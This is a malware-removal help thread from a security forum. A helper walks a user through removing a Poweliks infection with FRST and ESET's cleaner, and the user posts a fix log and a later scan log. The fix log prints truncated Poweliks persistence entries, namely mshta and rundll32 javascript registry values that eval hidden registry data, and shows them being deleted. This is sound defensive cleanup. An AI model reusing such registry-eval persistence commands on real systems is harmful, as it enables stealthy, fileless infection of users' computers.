  • I'm against any form of pirated, illegal and counterfeit software and material. So if you have any installed on your system, I'll ask you to uninstall them right now. You don't have to tell me if you indeed had some or not, I'll give you the benefit of the doubt. Plus, this would be against BleepingComputer's rules;
  • Finally, in the end, you are the one asking for assistance here. So if you wish to go a different way during the clean-up, like format and reinstall Windows, you are free to do so. I would appreciate you to let me know about it first, and if you need, I can also assist you in the process;
  • Since I'm still a trainee, all my posts have to be reviewed by an instructor prior to be posted to make sure that you receive the best assistance possible. Sorry for the inconvenience;
This being said, it's time to clean-up some malware, so let's get started, shall we? :)

You are currently infected with Poweliks, hence why everything is running slowly on your system and the programs are currently crashing. I also suspect that this infection triggered the alert by your ISP. We'll see it after we remove it :) First, we'll run a FRST fix to take care of it, and remove remnants from other PUPs, browser hijackers and uninstalled programs on your system, and then we'll ESET Poweliks Cleaner to make sure that the infection is completely gone from your system. Follow the instructions below please.

iO3R662.pngFarbar Recovery Scan Tool (FRST) - Fix mode
Follow the instructions below to execute a fix on your system using FRST, and provide the log in your next reply.
  • Download the attached fixlist.txt file, and save it on your Desktop (or wherever your FRST.exe/FRST64.exe executable is located);
  • Right-click on the FRST executable and select Spcusrh.pngRun as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users);
  • Click on the Fix button;
    NYA5Cbr.png
  • On completion, a message will come up saying that the fix has been completed and it'll open a log in Notepad;
  • Copy and paste that log in your next reply;


ESET Poweliks Cleaner
logo.png
Please download Powelikscleaner (by ESET) and save it to your Desktop.
  • Double-click ESETPoweliksCleaner.exe to start the tool.
  • Read the terms of the End-user license agreement and click Agree if you agree to them.
  • The tool will run automatically. If the cleaner finds a Poweliks infection, press the Y key on your keyboard to remove it.
  • If Poweliks was detected "Win32/Poweliks was successfully removed from your system" will be displayed. Press any key to exit the tool and reboot your PC.
  • The tool will produce a log in the same directory the tool was run from.
  • Please copy and paste the log in your next reply.
1.png
2.png

Your next reply should include:
  • Copy/pasted content of the FRST.txt log;
  • Copy/pasted content of the Addition.txt log;
  • Copy/pasted content of the ESET Poweliks Cleaner log;

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#4 therrrn

therrrn
  • Topic Starter

  • Members
  • 47 posts
  • OFFLINE
  •  
  • Local time:12:03 PM

Posted 04 February 2016 - 08:07 PM

I'm having a hard time posting. It won't go through. I'm going to have to try again later. 



#5 therrrn

therrrn
  • Topic Starter

  • Members
  • 47 posts
  • OFFLINE
  •  
  • Local time:12:03 PM

Posted 04 February 2016 - 11:21 PM

So, I've been sitting with another tab open, waiting for it to post my reply with the logs. It's been over 15 minutes and this is the 5th time I've tried. It's just saying "Saving post..." down at the bottom. I mean, the ESET log is super long, so maybe that's it. I don't know. I ran the fix, that took a couple minutes. Then I ran the ESET and that took less than a minute. It said that the Poweliks virus was not found in my system. That log is super long. I posted them both but it's just sitting there forever. I'll leave it while I'm in the shower and getting dressed right now, but other than that, I don't know what to do. Does this have to do with something being wrong or is this normal because the log is so long?



#6 therrrn

therrrn
  • Topic Starter

  • Members
  • 47 posts
  • OFFLINE
  •  
  • Local time:12:03 PM

Posted 05 February 2016 - 12:19 AM

Yup. It's been over an hour, now. It's still just sitting there, "Saving post..." Maybe I could message it to you or something? I don't know what else to do. 



#7 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,695 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:03:03 PM

Posted 05 February 2016 - 12:20 PM

If you cannot post the logs here, can you post them on Pastebin.com, and give me the URLs to the pastes here?

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#8 therrrn

therrrn
  • Topic Starter

  • Members
  • 47 posts
  • OFFLINE
  •  
  • Local time:12:03 PM

Posted 05 February 2016 - 10:20 PM

They're saying it's too long on pastebin. I hate this thing. I'm going to try to post it in numerous posts, because I feel like the sheer size of the ESET log is what's making this so infuriating. Ok, so you asked for the fix log and ESET log, but you finished up with asking for the frst log and the additional. I wasn't sure if you wanted me to rerun that or not, but I don't want to have needless info in here, just in case you don't need it, so I didn't include those. If you need them, please let me know. So I ran the fix and then it instructed me to restart my computer, so I did. Then I ran the ESET and it said there was nothing found in my system. Here is the fixlog. Thank you again so much for your time and putting up with all of this. 

 

Fix Log

 

Fix result of Farbar Recovery Scan Tool (x64) Version:27-01-2016
Ran by Owner (2016-02-04 15:29:16) Run:2
Running from C:\Users\Owner\Desktop
Loaded Profiles: Owner (Available Profiles: Owner & postgres)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
CloseProcesses:
 
HKLM-x32\...\Run: [**26bf4b46<*>] => mshta javascript:rXOH8WLW="tGumlmgk2b";L7C6=new%20ActiveXObject("WScript.Shell");NJk5qVRD="sAn0KJN";lM6lp=L7C6.RegRead("HKLM\\software\\Wow6432Node\\2ac6ccfc33\\bfe154c4");o2ED5vECMd="qE";eval(lM6lp); (the data entry has 18 more characters). <===== ATTENTION (Value Name with invalid characters)
HKLM\...\Policies\Explorer\Run: [**e5f34806<*>] => mshta javascript:KNi8K5ub="QPC33YyeF";D5V5=new%20ActiveXObject("WScript.Shell");euiaPgY8b="Cx2S";CZ8NC=D5V5.RegRead("HKLM\\software\\Wow6432Node\\2ac6ccfc33\\bfe154c4");VkCHg93f="Fz";eval(CZ8NC);lcseF (the data entry has 10 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-2923065098-2265594029-2962721977-1000\...\Run: [**26bf4b46<*>] => mshta javascript:LAjpmIq4="a1YS4";aR3=new%20ActiveXObject("WScript.Shell");uHc2LtCR="lnWFUZXik4";AZ2t2p=aR3.RegRead("HKCU\\software\\2ac6ccfc33\\bfe154c4");U2XUULY="dyk";eval(AZ2t2p);jDxZHdx5I="ASx2PF (the data entry has 4 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-2923065098-2265594029-2962721977-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"jq8\..\mshtml,RunHTMLApplication ";eval("usxzcsqf7<odv!@buhwdYNckdbu)#VRbsh (the data entry has 28617 more characters). <==== Poweliks!
CustomCLSID: HKU\S-1-5-21-2923065098-2265594029-2962721977-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"jq8\..\mshtml,RunHTMLApplication ";eval("usxzcsqf7<odv!@buhwdYNckdbu)#VRbsh (the data entry has 28628 more characters). <==== Poweliks?
 
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\.DEFAULT\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-2923065098-2265594029-2962721977-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.yahoo.com?fr=hp-avast&type=avastbcl
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\S-1-5-21-2923065098-2265594029-2962721977-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://search.yahoo.com/yhs/search?type=avastbcl&hspart=avast&hsimp=yhs-001&p={searchTerms}
HKU\S-1-5-21-2923065098-2265594029-2962721977-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.yahoo.com?fr=hp-avast&type=avastbcl
HKU\S-1-5-21-2923065098-2265594029-2962721977-1000\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxps://www.yahoo.com?fr=hp-avast&type=avastbcl
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM -> {3C0B9203-745F-446D-81C7-77ED9BAA6977} URL = hxxp://www.bing.com/search?q={searchTerms}&amp;form=DLCDF8&amp;pc=MDDC&amp;src=IE-SearchBox
SearchScopes: HKLM-x32 -> DefaultScope {9CB96984-43C3-4D44-90EF-01466EFCF7BB} URL = hxxps://search.yahoo.com/yhs/search?type=avastbcl&hspart=avast&hsimp=yhs-001&p={searchTerms}
SearchScopes: HKLM-x32 -> {9CB96984-43C3-4D44-90EF-01466EFCF7BB} URL = hxxps://search.yahoo.com/yhs/search?type=avastbcl&hspart=avast&hsimp=yhs-001&p={searchTerms}
SearchScopes: HKU\S-1-5-21-2923065098-2265594029-2962721977-1000 -> DefaultScope {9CB96984-43C3-4D44-90EF-01466EFCF7BB} URL = hxxps://search.yahoo.com/yhs/search?type=avastbcl&hspart=avast&hsimp=yhs-001&p={searchTerms}
SearchScopes: HKU\S-1-5-21-2923065098-2265594029-2962721977-1000 -> SuggestionsURL_JSON hxxp://suggest.search.conduit.com/CSuggestJson.ashx?prefix={searchTerms}
SearchScopes: HKU\S-1-5-21-2923065098-2265594029-2962721977-1000 -> {3C0B9203-745F-446D-81C7-77ED9BAA6977} URL = 
SearchScopes: HKU\S-1-5-21-2923065098-2265594029-2962721977-1000 -> {95B7759C-8C7F-4BF1-B163-73684A933233} URL = hxxp://mysearch.avg.com/search?cid={FF4A171E-C3AB-4989-AA8E-AEBD661F0BD8}&mid=b1b33dd3302c47d3aee02104e484cc7b-91d57b6c0a0399f3896f660d2ad5acde1a0061f2&lang=en&ds=oc011&coid=avgtbdisoc&cmpid=&pr=sa&d=2014-06-10 02:42:01&v=18.1.0.443&pid=safeguard&sg=&sap=dsp&q={searchTerms}
SearchScopes: HKU\S-1-5-21-2923065098-2265594029-2962721977-1000 -> {9CB96984-43C3-4D44-90EF-01466EFCF7BB} URL = hxxps://search.yahoo.com/yhs/search?type=avastbcl&hspart=avast&hsimp=yhs-001&p={searchTerms}
DPF: HKLM-x32 {DF780F87-FF2B-4DF8-92D0-73DB16A1543A} hxxp://l.yimg.com/jh/games/popcap/zuma/popcaploader_v6.cab
Toolbar: HKLM-x32 - No Name - {95B7759C-8C7F-4BF1-B163-73684A933233} -  No File
Handler-x32: viprotocol - {B658800C-F66E-4EF3-AB85-6C0C227862A9} - C:\Program Files (x86)\Common Files\AVG Secure Search\ViProtocolInstaller\18.1.7\ViProtocol.dll [2014-06-11] (AVG Secure Search)
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} -  No File
 
FF Plugin-x32: @avg.com/AVG SiteSafety plugin,version=11.0.0.1,application/x-avg-sitesafety-plugin -> C:\Program Files (x86)\Common Files\AVG Secure Search\SiteSafetyInstaller\18.1.7\\npsitesafety.dll [No File]
 
CHR HomePage: Default -> hxxp://search.conduit.com/?ctid=CT3324790&octid=EB_ORIGINAL_CTID&SearchSource=55&CUI=&UM=4&UP=SPD5AB1073-39FB-4384-AAB4-904BCB7A9792&SSPV=SE1CG2_sp_ch
 
R2 vToolbarUpdater18.1.7; C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.7\ToolbarUpdater.exe [1808408 2014-06-11] (AVG Secure Search)
S2 AntiVirSchedulerService; "C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe" [X]
S2 AntiVirService; "C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe" [X]
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
S3 esgiguard; \??\C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys [X]
 
Task: {A2FC2D6C-F790-4957-A987-D81A26455AB6} - System32\Tasks\SpyHunter4Startup => C:\Program Files\Enigma Software Group\SpyHunter\Spyhunter4.exe
Task: {0D9567C6-7263-4654-99D1-88513B6B67B5} - System32\Tasks\Norton Security Suite\Norton Error Processor => C:\Program Files (x86)\Norton Security Suite\Engine\20.4.0.40\SymErr.exe
Task: {829807B4-2467-4DFA-A7D2-304E341FE9E1} - System32\Tasks\Norton WSC Integration => C:\Program Files (x86)\Norton Security Suite\Engine\20.4.0.40\WSCStub.exe
Task: {FEA7664C-332A-465E-96BD-DE53F4CC2E3B} - System32\Tasks\Norton Security Suite\Norton Error Analyzer => C:\Program Files (x86)\Norton Security Suite\Engine\20.4.0.40\SymErr.exe
Task: {8F323181-D900-4871-BC76-5FA8EEBF23F4} - System32\Tasks\{30F83A17-1668-427C-B2D4-B68B6BE06946} => pcalua.exe -a C:\PROGRA~2\CLICK'~1\UNWISE.EXE -c C:\PROGRA~2\CLICK'~1\INSTALL.LOG
 
FirewallRules: [{35BBFCDA-E181-40FE-ADDC-ECF09480092A}] => (Allow) C:\Users\Owner\AppData\Local\Temp\7zS44BD.tmp\SymNRT.exe
FirewallRules: [{47F3E34D-FD86-495D-AE06-B48140222D93}] => (Allow) C:\Users\Owner\AppData\Local\Temp\7zS44BD.tmp\SymNRT.exe
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\PEVSystemStart => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\procexp90.Sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PEVSystemStart => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\procexp90.Sys => ""="Driver"
 
C:\ComboFix
C:\Program Files (x86)\Avira
C:\Program Files (x86)\Common Files\AVG Secure Search
C:\Program Files (x86)\Google\GoogleToolbarNotifier
C:\Program Files (x86)\Norton Security Suite
C:\Program Files (x86)\Kaspersky Lab
C:\Program Files\Enigma Software Group
C:\PROGRA~2\CLICK'~1
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk
C:\Users\Owner\AppData\Local\{DE022639-9356-4826-8C5A-6A75C651AB81}
C:\Windows\pss\McAfee Security Scan Plus.lnk.CommonStartup
C:\Windows\System32\Tasks\{BFAD41C2-E97A-4707-860A-5AB2C7A44E25}
C:\Windows\System32\Tasks\{170FABC1-475D-499D-BDAD-325B117E8ECE}
 
REG: REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\AVP"
REG: REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\swg"
 
EmptyTemp:
*****************
 
Processes closed successfully.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\**26bf4b46<*> => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\\**e5f34806<*> => value removed successfully
HKU\S-1-5-21-2923065098-2265594029-2962721977-1000\Software\Microsoft\Windows\CurrentVersion\Run\\**26bf4b46<*> => value removed successfully
"HKU\S-1-5-21-2923065098-2265594029-2962721977-1000\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => key removed successfully
"HKU\S-1-5-21-2923065098-2265594029-2962721977-1000\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => key removed successfully
HKU\S-1-5-21-2923065098-2265594029-2962721977-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} => key not found. 
"HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer" => key removed successfully
"HKU\.DEFAULT\SOFTWARE\Policies\Microsoft\Internet Explorer" => key removed successfully
"HKU\S-1-5-21-2923065098-2265594029-2962721977-1000\SOFTWARE\Policies\Microsoft\Internet Explorer" => key removed successfully
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Start Page => value restored successfully
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Page_URL => value restored successfully
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Search_URL => value restored successfully
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main\\Search Page => value removed successfully
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main\\Start Page => value removed successfully
HKU\S-1-5-21-2923065098-2265594029-2962721977-1000\Software\Microsoft\Internet Explorer\Main\\Search Page => value restored successfully
HKU\S-1-5-21-2923065098-2265594029-2962721977-1000\Software\Microsoft\Internet Explorer\Main\\Start Page => value restored successfully
HKU\S-1-5-21-2923065098-2265594029-2962721977-1000\Software\Microsoft\Internet Explorer\Main\\Search Bar => value removed successfully
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" => key removed successfully
HKCR\CLSID\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => key not found. 
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{3C0B9203-745F-446D-81C7-77ED9BAA6977}" => key removed successfully
HKCR\CLSID\{3C0B9203-745F-446D-81C7-77ED9BAA6977} => key not found. 
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{9CB96984-43C3-4D44-90EF-01466EFCF7BB}" => key removed successfully
HKCR\Wow6432Node\CLSID\{9CB96984-43C3-4D44-90EF-01466EFCF7BB} => key not found. 
HKU\S-1-5-21-2923065098-2265594029-2962721977-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value removed successfully
HKU\S-1-5-21-2923065098-2265594029-2962721977-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\SuggestionsURL_JSON => value removed successfully
"HKU\S-1-5-21-2923065098-2265594029-2962721977-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{3C0B9203-745F-446D-81C7-77ED9BAA6977}" => key removed successfully
HKCR\CLSID\{3C0B9203-745F-446D-81C7-77ED9BAA6977} => key not found. 
"HKU\S-1-5-21-2923065098-2265594029-2962721977-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{95B7759C-8C7F-4BF1-B163-73684A933233}" => key removed successfully
HKCR\CLSID\{95B7759C-8C7F-4BF1-B163-73684A933233} => key not found. 
"HKU\S-1-5-21-2923065098-2265594029-2962721977-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{9CB96984-43C3-4D44-90EF-01466EFCF7BB}" => key removed successfully
HKCR\CLSID\{9CB96984-43C3-4D44-90EF-01466EFCF7BB} => key not found. 
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Code Store Database\Distribution Units\{DF780F87-FF2B-4DF8-92D0-73DB16A1543A}" => key removed successfully
HKCR\Wow6432Node\CLSID\{DF780F87-FF2B-4DF8-92D0-73DB16A1543A} => key not found. 
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Toolbar\\{95B7759C-8C7F-4BF1-B163-73684A933233} => value removed successfully
HKCR\Wow6432Node\CLSID\{95B7759C-8C7F-4BF1-B163-73684A933233} => key not found. 
"HKCR\Wow6432Node\PROTOCOLS\Handler\viprotocol" => key removed successfully
"HKCR\Wow6432Node\CLSID\{B658800C-F66E-4EF3-AB85-6C0C227862A9}" => key removed successfully
"HKCR\PROTOCOLS\Handler\skype4com" => key removed successfully
HKCR\CLSID\{FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} => key not found. 
"HKLM\Software\Wow6432Node\MozillaPlugins\@avg.com/AVG SiteSafety plugin,version=11.0.0.1,application/x-avg-sitesafety-plugin" => key removed successfully
Chrome HomePage => removed successfully
vToolbarUpdater18.1.7 => service removed successfully
AntiVirSchedulerService => service removed successfully
AntiVirService => service removed successfully
catchme => service removed successfully
esgiguard => service removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{A2FC2D6C-F790-4957-A987-D81A26455AB6}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A2FC2D6C-F790-4957-A987-D81A26455AB6}" => key removed successfully
C:\Windows\System32\Tasks\SpyHunter4Startup => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SpyHunter4Startup" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0D9567C6-7263-4654-99D1-88513B6B67B5}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0D9567C6-7263-4654-99D1-88513B6B67B5}" => key removed successfully
C:\Windows\System32\Tasks\Norton Security Suite\Norton Error Processor => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Norton Security Suite\Norton Error Processor" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{829807B4-2467-4DFA-A7D2-304E341FE9E1}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{829807B4-2467-4DFA-A7D2-304E341FE9E1}" => key removed successfully
C:\Windows\System32\Tasks\Norton WSC Integration => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Norton WSC Integration" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{FEA7664C-332A-465E-96BD-DE53F4CC2E3B}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FEA7664C-332A-465E-96BD-DE53F4CC2E3B}" => key removed successfully
C:\Windows\System32\Tasks\Norton Security Suite\Norton Error Analyzer => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Norton Security Suite\Norton Error Analyzer" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{8F323181-D900-4871-BC76-5FA8EEBF23F4}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8F323181-D900-4871-BC76-5FA8EEBF23F4}" => key removed successfully
C:\Windows\System32\Tasks\{30F83A17-1668-427C-B2D4-B68B6BE06946} => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{30F83A17-1668-427C-B2D4-B68B6BE06946}" => key removed successfully
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{35BBFCDA-E181-40FE-ADDC-ECF09480092A} => value removed successfully
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{47F3E34D-FD86-495D-AE06-B48140222D93} => value removed successfully
"HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\PEVSystemStart" => key removed successfully
"HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\procexp90.Sys" => key removed successfully
"HKLM\System\CurrentControlSet\Control\SafeBoot\Network\PEVSystemStart" => key removed successfully
"HKLM\System\CurrentControlSet\Control\SafeBoot\Network\procexp90.Sys" => key removed successfully
"C:\ComboFix" => not found.
C:\Program Files (x86)\Avira => moved successfully
C:\Program Files (x86)\Common Files\AVG Secure Search => moved successfully
"C:\Program Files (x86)\Google\GoogleToolbarNotifier" => not found.
"C:\Program Files (x86)\Norton Security Suite" => not found.
"C:\Program Files (x86)\Kaspersky Lab" => not found.
C:\Program Files\Enigma Software Group => moved successfully
C:\PROGRA~2\CLICK'~1 => moved successfully
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk" => not found.
C:\Users\Owner\AppData\Local\{DE022639-9356-4826-8C5A-6A75C651AB81} => moved successfully
C:\Windows\pss\McAfee Security Scan Plus.lnk.CommonStartup => moved successfully
C:\Windows\System32\Tasks\{BFAD41C2-E97A-4707-860A-5AB2C7A44E25} => moved successfully
C:\Windows\System32\Tasks\{170FABC1-475D-499D-BDAD-325B117E8ECE} => moved successfully
 
========= REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\AVP" =========
 
Permanently delete the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\AVP (Yes/No)? The operation completed successfully.
 
 
 
========= End of Reg: =========
 
 
========= REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\swg" =========
 
Permanently delete the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\swg (Yes/No)? The operation completed successfully.
 
 
 
========= End of Reg: =========
 
EmptyTemp: => 13.6 GB temporary data Removed.
 
 
The system needed a reboot.
 
==== End of Fixlog 15:32:54 ====


#9 therrrn

therrrn
  • Topic Starter

  • Members
  • 47 posts
  • OFFLINE
  •  
  • Local time:12:03 PM

Posted 05 February 2016 - 10:26 PM

OK, and here is part one of the ESET log. I'll break it into 5 or 6, since apparently, it's now saying post too long when I try breaking it down to just 3. 

 

Edited to reduce topic clutter. Log posted here: http://pasted.co/c9e35f2a. xXToffeeXx~

Edited by xXToffeeXx, 07 February 2016 - 05:58 AM.


#10 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,695 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:03:03 PM

Posted 07 February 2016 - 11:24 AM

I'm sorry, I forgot that the log ESET Poweliks Cleaner create is really big. I should have asked you to attach it instead. I'll ask a Moderator to clean up this thread a bit, since it'll become hard to go through it quickly in the future.

On the bright side however, the FRST fix worked very well to remove the Poweliks infection, and ESET Poweliks Cleaner confirms that it isn't present on your system anymore. Now before we move on, I would like you to provide me fresh FRST logs to make sure that the big chunk of the infection is gone.

iO3R662.pngFarbar Recovery Scan Tool (FRST) - Scan mode
Follow the instructions below to download and execute a scan on your system with FRST, and provide the logs in your next reply.
  • Right-click on the executable and select Spcusrh.pngRun as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users);
  • Accept the disclaimer by clicking on Yes, and FRST will then do a back-up of your Registry which should take a few seconds;
  • Check the Addition.txt option;
  • Click on the Scan button;
  • On completion, two message box will open, saying that the results were saved to FRST.txt and Addition.txt, then open two Notepad files;
  • Copy and paste the content of FRST.txt in your next reply, and attach Addition.txt to it;
Also, how's your computer running now? Is it still slow? Are your programs still hanging and/or crashing? Is it still hard to startup completely? Do you still have BSODs?

Your next reply should include:
  • Copy/pasted content of the FRST.txt log;
  • Copy/pasted content of the Addition.txt log;
  • Answer to my question about how your computer is currently running;

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#11 therrrn

therrrn
  • Topic Starter

  • Members
  • 47 posts
  • OFFLINE
  •  
  • Local time:12:03 PM

Posted 09 February 2016 - 01:40 PM

Oh, perfect. I should have thought about attaching it, myself. My bad. I will post the new logs when I get home tonight. Thank you!

#12 therrrn

therrrn
  • Topic Starter

  • Members
  • 47 posts
  • OFFLINE
  •  
  • Local time:12:03 PM

Posted 10 February 2016 - 05:25 AM

So, I've been super busy over the last few days and haven't really had a chance to be on my computer very much. It seems to be running better from what I've noticed already, but I haven't really had time to be on it much. I can open Word without it crashing repeatedly yet, which is nice. :thumbup2: 

 

Here are the new logs.

 

FRST:

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:27-01-2016
Ran by Owner (administrator) on ERIN (10-02-2016 02:20:21)
Running from C:\Users\Owner\Desktop
Loaded Profiles: Owner (Available Profiles: Owner & postgres)
Platform: Windows 7 Home Premium Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Stardock Corporation) C:\Program Files\Dell\DellDock\DockLogin.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Andrea Electronics Corporation) C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe
(Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe
(Intel® Corporation) C:\Program Files\Intel\WiMAX\Bin\AppSrv.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation) C:\Windows\System32\GWX\GWX.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Red Bend Ltd.) C:\Program Files\Intel\WiMAX\Bin\DMAgent.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe
(Microsoft Corporation) C:\Program Files (x86)\Common Files\microsoft shared\Virtualization Handler\CVHSVC.EXE
